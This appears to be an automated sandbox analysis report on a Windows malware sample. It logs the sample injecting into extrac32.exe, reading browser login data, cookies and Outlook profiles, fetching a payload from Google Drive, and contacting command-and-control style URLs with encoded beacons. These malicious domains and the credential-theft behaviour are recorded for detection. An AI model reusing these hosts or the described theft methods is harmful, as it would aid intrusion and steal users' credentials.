        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\extrac32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        1
        OS Credential Dumping
        21
        Security Software Discovery
        Remote Services1
        Email Collection
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
        System Shutdown/Reboot
        Acquire InfrastructureGather Victim Identity Information
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts412
        Process Injection
        2
        Virtualization/Sandbox Evasion
        LSASS Memory2
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        Exfiltration Over Bluetooth3
        Ingress Tool Transfer
        SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        Automated Exfiltration4
        Non-Application Layer Protocol
        Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook412
        Process Injection
        NTDS1
        Application Window Discovery
        Distributed Component Object Model1
        Clipboard Data
        Traffic Duplication5
        Application Layer Protocol
        Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
        Obfuscated Files or Information
        Cached Domain Credentials4
        System Information Discovery
        VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1344305 Sample: U6SJBLxT2Z.exe Startdate: 17/11/2023 Architecture: WINDOWS Score: 100 31 www.littlehappiez.com 2->31 33 www.jilimacao1.com 2->33 35 21 other IPs or domains 2->35 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 2 other signatures 2->53 10 U6SJBLxT2Z.exe 36 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 29 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->29 dropped 13 U6SJBLxT2Z.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.176.206, 443, 50127 GOOGLEUS United States 13->43 45 googlehosted.l.googleusercontent.com 142.250.81.225, 443, 50128 GOOGLEUS United States 13->45 63 Maps a DLL or memory area into another process 13->63 17 RvEFtjZJSPYTXuqJXJdvrvwe.exe 13->17 injected signatures8 process9 process10 19 extrac32.exe 13 17->19         started        signatures11 55 Tries to steal Mail credentials (via file / registry access) 19->55 57 Tries to harvest and steal browser information (history, passwords, etc) 19->57 59 Writes to foreign memory regions 19->59 61 3 other signatures 19->61 22 RvEFtjZJSPYTXuqJXJdvrvwe.exe 19->22 injected 25 firefox.exe 19->25         started        process12 dnsIp13 37 www.ritualyoga.org 216.40.34.41, 50158, 50159, 50160 TUCOWSCA Canada 22->37 39 ayotundewrites.com 83.229.19.76, 50178, 50179, 50180 SKYVISIONGB United Kingdom 22->39 41 13 other IPs or domains 22->41

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        U6SJBLxT2Z.exe25%ReversingLabsWin32.Trojan.Garf
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsr10DA.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.visionquestengage.life/fbkg/0%Avira URL Cloudsafe
        http://www.bellcom.media/fbkg/0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.alwayswim.com/fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A==0%Avira URL Cloudsafe
        http://www.ritualyoga.org/fbkg/0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.jilimacao1.com0%Avira URL Cloudsafe
        http://www.meikaij.com/fbkg/?T6I=JvFp7LObb8w6k6PWFFu4/g+CbhB1FcykldcNag5cVf7fen5OcF+np2qjjm2WzVoow/Lbgs0uDNprrr2Z1f5x8N4+tvsVxyFjvg==&Nx1L1=526dgl_phJ0%Avira URL Cloudsafe
        http://www.frhighdaypharms.com/fbkg/100%Avira URL Cloudmalware
        http://www70.alwayswim.com/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.alwayswim.com/fbkg?gp=1&js=1&uuid=1700245835.0022985391&other_args=eyJ1cmkiOiAiL2Zia2ciLC0%Avira URL Cloudsafe
        http://www.littlehappiez.com/fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ100%Avira URL Cloudmalware
        http://www.alwayswim.com/fbkg/0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.jilimacao1.com/fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew==0%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://www.bellcom.media/fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA==0%Avira URL Cloudsafe
        http://www.lets-room.online/fbkg/100%Avira URL Cloudmalware
        http://www.scoopstarz.com/fbkg/0%Avira URL Cloudsafe
        http://www.zzxxyy13.top/fbkg/0%Avira URL Cloudsafe
        http://www.jilimacao1.com/fbkg/0%Avira URL Cloudsafe
        http://www.g9rq2sx.icu/fbkg/0%Avira URL Cloudsafe
        https://littlehappiez.com/fbkg?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o100%Avira URL Cloudmalware
        http://www.littlehappiez.com/fbkg/100%Avira URL Cloudmalware
        http://www.ayotundewrites.com/fbkg/?Nx1L1=526dgl_phJ&T6I=UungwqTjR2NkRdXrNdQfdlAnW2b4DymMYxcPl6KlSbWp+xJntUzCoedXs8frtFusR354iK6c4sMvjrt0XEEPlm9MfIU/t8N/Rw==0%Avira URL Cloudsafe
        http://www.342448.com/fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ==0%Avira URL Cloudsafe
        http://www.zzxxyy13.top/fbkg/?Nx1L1=526dgl_phJ&T6I=phdEJzY3z123NWJi2+fkwEMFilDirFFbJmqiBLbxbwYPRraRZTedw0TneWwvlFl/lqwQMG1RzPJyvsXQPPSKc8SU/NqM8DtUSg==0%Avira URL Cloudsafe
        http://www.meikaij.com/fbkg/0%Avira URL Cloudsafe
        http://www.hcmesx.store/fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJ0%Avira URL Cloudsafe
        https://dxymtz03.cc/cpc05/?channelCode=cpc050%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://www.hcmesx.store/fbkg/0%Avira URL Cloudsafe
        https://mozilla.org00%Avira URL Cloudsafe
        http://www.frhighdaypharms.com/fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow==100%Avira URL Cloudmalware
        http://www.visionquestengage.life/fbkg/?Nx1L1=526dgl_phJ&T6I=PmdWTXkLywcqbBlTiCrJQt3Yuck0afzst3mD161eQBW3I6FKBwy/y4jZCgtmn12fl81iUYGrhkG3BZZ88H83AYfIbFWSFx21qw==0%Avira URL Cloudsafe
        http://www.ritualyoga.org/fbkg/?T6I=JkjxJVy7+VXqa4gzNBPrmSWPXfQ7ycJIKM5SFrEbg6dYWeaIdA23wJ7qOttvdhiZexnFzUpO5XAbvrWtFrekBpAEzqUmGc3/RA==&Nx1L1=526dgl_phJ0%Avira URL Cloudsafe
        http://www.ayotundewrites.com/fbkg/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.scoopstarz.com/fbkg/?T6I=p9Bv2ZaqDj0B+e+ypRT8GlSwNlQxTeh6EqXXTwB9+WRzCtFNeIn1Fpb3phnzmJVlQdbT0fpxscdkLw+HDUtKzdkzARk7C/olAA==&Nx1L1=526dgl_phJ0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.342448.com
        104.21.46.236
        truefalse
          unknown
          frhighdaypharms.com
          209.182.252.245
          truefalse
            unknown
            ayotundewrites.com
            83.229.19.76
            truefalse
              unknown
              www.scoopstarz.com
              104.21.52.182
              truefalse
                unknown
                www.hcmesx.store
                38.59.48.86
                truefalse
                  unknown
                  www.ritualyoga.org
                  216.40.34.41
                  truefalse
                    unknown
                    shops.myshopify.com
                    23.227.38.74
                    truefalse
                      unknown
                      www.meikaij.com
                      199.59.243.225
                      truefalse
                        unknown
                        web.wj-web.net
                        34.126.191.84
                        truefalse
                          unknown
                          www.g9rq2sx.icu
                          38.163.97.8
                          truefalse
                            unknown
                            www.lets-room.online
                            194.58.112.174
                            truefalse
                              unknown
                              www.visionquestengage.life
                              198.177.123.106
                              truefalse
                                unknown
                                www.alwayswim.com
                                45.33.23.183
                                truefalse
                                  unknown
                                  drive.google.com
                                  142.250.176.206
                                  truefalse
                                    high
                                    www.zzxxyy13.top
                                    160.202.170.21
                                    truefalse
                                      unknown
                                      www.bellcom.media
                                      91.195.240.123
                                      truefalse
                                        unknown
                                        googlehosted.l.googleusercontent.com
                                        142.250.81.225
                                        truefalse
                                          high
                                          www.littlehappiez.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            doc-08-18-docs.googleusercontent.com
                                            unknown
                                            unknownfalse
                                              high
                                              www.cardsfinanse.online
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.ayotundewrites.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.jilimacao1.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.frhighdaypharms.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.bellcom.media/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.visionquestengage.life/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.ritualyoga.org/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.meikaij.com/fbkg/?T6I=JvFp7LObb8w6k6PWFFu4/g+CbhB1FcykldcNag5cVf7fen5OcF+np2qjjm2WzVoow/Lbgs0uDNprrr2Z1f5x8N4+tvsVxyFjvg==&Nx1L1=526dgl_phJfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.frhighdaypharms.com/fbkg/false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.alwayswim.com/fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.littlehappiez.com/fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.jilimacao1.com/fbkg/?Nx1L1=526dgl_phJ&T6I=B4jXnyaFtGUXQHU1NUiYYX7LdOtFOQUBPe+H2lr5u+EXU2X7vOdtwTNWEAPrWdGRSj2hi/d9Wgql3m3h6BHCa8reqpnu7N6Iew==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.alwayswim.com/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.lets-room.online/fbkg/false
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.bellcom.media/fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA==false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.scoopstarz.com/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zzxxyy13.top/fbkg/false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://doc-08-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0false
                                                        high
                                                        http://www.littlehappiez.com/fbkg/false
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.ayotundewrites.com/fbkg/?Nx1L1=526dgl_phJ&T6I=UungwqTjR2NkRdXrNdQfdlAnW2b4DymMYxcPl6KlSbWp+xJntUzCoedXs8frtFusR354iK6c4sMvjrt0XEEPlm9MfIU/t8N/Rw==false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.g9rq2sx.icu/fbkg/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.342448.com/fbkg/?Nx1L1=526dgl_phJ&T6I=LfqpcTqkrXaBnJID5l2tM8vOpSRv3MUMZfXyeB4RyH13MNyf/Jo5B8vwZE/hs/QEee4rKHvEo4v47oiItb+YS33BVH+SYzpbOQ==false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.zzxxyy13.top/fbkg/?Nx1L1=526dgl_phJ&T6I=phdEJzY3z123NWJi2+fkwEMFilDirFFbJmqiBLbxbwYPRraRZTedw0TneWwvlFl/lqwQMG1RzPJyvsXQPPSKc8SU/NqM8DtUSg==false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jilimacao1.com/fbkg/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.hcmesx.store/fbkg/?T6I=JuP+2JK8vI5+yQGAW5l1o2dXq+3Ksd0y6wg1KdtNGd9Gu0TSnfkwjHMHJqFqjZu7ChSweGH6mw1hhK/OtJKBpxcTcfvHXyAOQQ==&Nx1L1=526dgl_phJfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.meikaij.com/fbkg/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.visionquestengage.life/fbkg/?Nx1L1=526dgl_phJ&T6I=PmdWTXkLywcqbBlTiCrJQt3Yuck0afzst3mD161eQBW3I6FKBwy/y4jZCgtmn12fl81iUYGrhkG3BZZ88H83AYfIbFWSFx21qw==false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.hcmesx.store/fbkg/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.ritualyoga.org/fbkg/?T6I=JkjxJVy7+VXqa4gzNBPrmSWPXfQ7ycJIKM5SFrEbg6dYWeaIdA23wJ7qOttvdhiZexnFzUpO5XAbvrWtFrekBpAEzqUmGc3/RA==&Nx1L1=526dgl_phJfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.scoopstarz.com/fbkg/?T6I=p9Bv2ZaqDj0B+e+ypRT8GlSwNlQxTeh6EqXXTwB9+WRzCtFNeIn1Fpb3phnzmJVlQdbT0fpxscdkLw+HDUtKzdkzARk7C/olAA==&Nx1L1=526dgl_phJfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.ayotundewrites.com/fbkg/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.frhighdaypharms.com/fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow==false
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabextrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drfalse
                                                          high
                                                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchextrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=54Z8E45.5.drfalse
                                                              high
                                                              https://reg.ruextrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                https://www.instagram.com/hover_domainsextrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utmextrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    http://www70.alwayswim.com/RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.000000000404E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://support.google.com/chrome/?p=plugin_flashextrac32.exe, 00000005.00000002.16766230886.0000000007C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.jilimacao1.comRvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16760933797.0000000000CE3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDU6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                        high
                                                                        https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_landextrac32.exe, 00000005.00000002.16763654407.00000000062D4000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003874000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.gopher.ftp://ftp.U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.hover.com/email?source=parkedextrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.hover.com/about?source=parkedextrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.comU6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.0000000006C40000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.00000000041E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.alwayswim.com/fbkg?gp=1&js=1&uuid=1700245835.0022985391&other_args=eyJ1cmkiOiAiL2Zia2ciLCextrac32.exe, 00000005.00000002.16763654407.0000000006AAE000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.000000000404E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdU6SJBLxT2Z.exe, 00000002.00000001.11817930124.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.hover.com/domains/resultsextrac32.exe, 00000005.00000002.16763654407.00000000065F8000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://doc-08-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdU6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=extrac32.exe, 00000005.00000002.16766230886.0000000007D0F000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16766230886.0000000007CA7000.00000004.00000020.00020000.00000000.sdmp, 54Z8E45.5.drfalse
                                                                                      high
                                                                                      https://drive.google.com/U6SJBLxT2Z.exe, 00000002.00000002.12020464964.0000000002638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214U6SJBLxT2Z.exe, 00000002.00000001.11817930124.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://apis.google.comU6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.jsextrac32.exe, 00000005.00000002.16766116989.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, extrac32.exe, 00000005.00000002.16763654407.0000000005FB0000.00000004.10000000.00040000.00000000.sdmp, RvEFtjZJSPYTXuqJXJdvrvwe.exe, 00000006.00000002.16763130703.0000000003550000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://ocsp.quovadisoffshore.com0U6SJBLxT2Z.exe, 00000002.00000003.11923831613.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11935105503.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000003.11912765147.00000000026BF000.00000004.00000020.00020000.00000000.sdmp, U6SJBLxT2Z.exe, 00000002.00000002.12020742833.00000000026BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
